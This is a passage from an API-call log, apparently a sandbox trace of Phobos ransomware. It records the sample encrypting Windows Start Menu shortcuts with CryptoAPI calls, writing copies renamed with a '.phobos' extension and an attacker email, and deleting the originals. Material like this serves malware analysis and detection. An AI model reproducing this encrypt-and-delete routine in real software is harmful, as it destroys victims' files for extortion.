phKey=0x2e0f908*=0xa32ca8) returned 1 [0177.097] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.097] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0177.097] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0177.097] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0177.097] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.097] CloseHandle (hObject=0x190) returned 1 [0177.097] CloseHandle (hObject=0x180) returned 1 [0177.098] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\About Java.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\about java.lnk")) returned 1 [0177.099] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0177.099] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Configure Java.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\configure java.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.100] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1975) returned 1 [0177.100] CloseHandle (hObject=0x180) returned 1 [0177.100] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Configure Java.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\configure java.lnk")) returned 0x20 [0177.100] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Configure Java.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\configure java.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.100] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Configure Java.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\configure java.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.100] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.100] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.101] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Configure Java.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\configure java.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.101] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32968) returned 1 [0177.101] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.101] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x7b7, lpOverlapped=0x0) returned 1 [0177.109] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x7c0, dwBufLen=0x7c0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x7c0) returned 1 [0177.109] WriteFile (in: hFile=0x190, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x7c0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x7c0, lpOverlapped=0x0) returned 1 [0177.110] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0177.110] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.110] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0177.110] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0177.110] WriteFile (in: hFile=0x190, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0177.110] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.110] CloseHandle (hObject=0x180) returned 1 [0177.110] CloseHandle (hObject=0x190) returned 1 [0177.111] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Configure Java.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\configure java.lnk")) returned 1 [0177.112] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0177.112] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Visit Java.com.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\visit java.com.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.112] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1114) returned 1 [0177.113] CloseHandle (hObject=0x190) returned 1 [0177.113] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Visit Java.com.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\visit java.com.lnk")) returned 0x20 [0177.113] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Visit Java.com.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\visit java.com.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.113] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Visit Java.com.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\visit java.com.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.114] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.114] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.114] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Visit Java.com.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\visit java.com.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.115] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32968) returned 1 [0177.115] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.115] ReadFile (in: hFile=0x190, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x45a, lpOverlapped=0x0) returned 1 [0177.122] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x460, dwBufLen=0x460 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x460) returned 1 [0177.122] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x460, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x460, lpOverlapped=0x0) returned 1 [0177.123] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0177.123] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.123] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0177.123] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0177.123] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0177.123] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.123] CloseHandle (hObject=0x190) returned 1 [0177.123] CloseHandle (hObject=0x180) returned 1 [0177.123] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Java\\Visit Java.com.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\java\\visit java.com.lnk")) returned 1 [0177.125] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0177.125] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Create Recovery Disc.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\create recovery disc.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.125] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1248) returned 1 [0177.125] CloseHandle (hObject=0x180) returned 1 [0177.125] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Create Recovery Disc.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\create recovery disc.lnk")) returned 0x20 [0177.125] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Create Recovery Disc.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\create recovery disc.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.125] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Create Recovery Disc.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\create recovery disc.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.125] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.125] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.125] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Create Recovery Disc.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\create recovery disc.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.129] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32968) returned 1 [0177.129] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.129] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4e0, lpOverlapped=0x0) returned 1 [0177.139] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4f0, dwBufLen=0x4f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4f0) returned 1 [0177.139] WriteFile (in: hFile=0x190, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4f0, lpOverlapped=0x0) returned 1 [0177.140] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0177.140] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.140] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0177.140] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0177.140] WriteFile (in: hFile=0x190, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0177.140] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.140] CloseHandle (hObject=0x180) returned 1 [0177.140] CloseHandle (hObject=0x190) returned 1 [0177.140] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Maintenance\\Create Recovery Disc.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\maintenance\\create recovery disc.lnk")) returned 1 [0177.142] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0177.142] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Media Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\media center.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.142] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1345) returned 1 [0177.142] CloseHandle (hObject=0x190) returned 1 [0177.142] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Media Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\media center.lnk")) returned 0x20 [0177.142] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Media Center.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\media center.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.142] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Media Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\media center.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.143] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.143] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.143] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Media Center.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\media center.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.143] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32968) returned 1 [0177.144] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.144] ReadFile (in: hFile=0x190, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x541, lpOverlapped=0x0) returned 1 [0177.152] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x550, dwBufLen=0x550 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x550) returned 1 [0177.152] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x550, lpOverlapped=0x0) returned 1 [0177.153] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ca8) returned 1 [0177.153] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.153] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0177.153] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0177.153] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0177.153] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.153] CloseHandle (hObject=0x190) returned 1 [0177.153] CloseHandle (hObject=0x180) returned 1 [0177.154] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Media Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\media center.lnk")) returned 1 [0177.155] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0177.155] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Excel 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft excel 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.155] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2951) returned 1 [0177.155] CloseHandle (hObject=0x180) returned 1 [0177.155] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Excel 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft excel 2010.lnk")) returned 0x20 [0177.155] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Excel 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft excel 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.156] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Excel 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft excel 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.156] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.156] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0177.156] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Excel 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft excel 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.157] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32968) returned 1 [0177.157] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.157] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xb87, lpOverlapped=0x0) returned 1 [0177.167] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb90, dwBufLen=0xb90 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb90) returned 1 [0177.167] WriteFile (in: hFile=0x190, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xb90, lpOverlapped=0x0) returned 1 [0177.168] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c68) returned 1 [0177.168] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0177.168] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0177.168] CryptDestroyKey (hKey=0xa32c68) returned 1 [0177.168] WriteFile (in: hFile=0x190, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0177.168] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.168] CloseHandle (hObject=0x180) returned 1 [0177.168] CloseHandle (hObject=0x190) returned 1 [0177.170] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Excel 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft excel 2010.lnk")) returned 1 [0177.171] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0177.171] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Filler 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft infopath filler 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0177.171] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3026) returned 1 [0177.172] CloseHandle (hObject=0x180) returned 1 [0177.172] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Filler 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft infopath filler 2010.lnk")) returned 0x20 [0177.172] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft 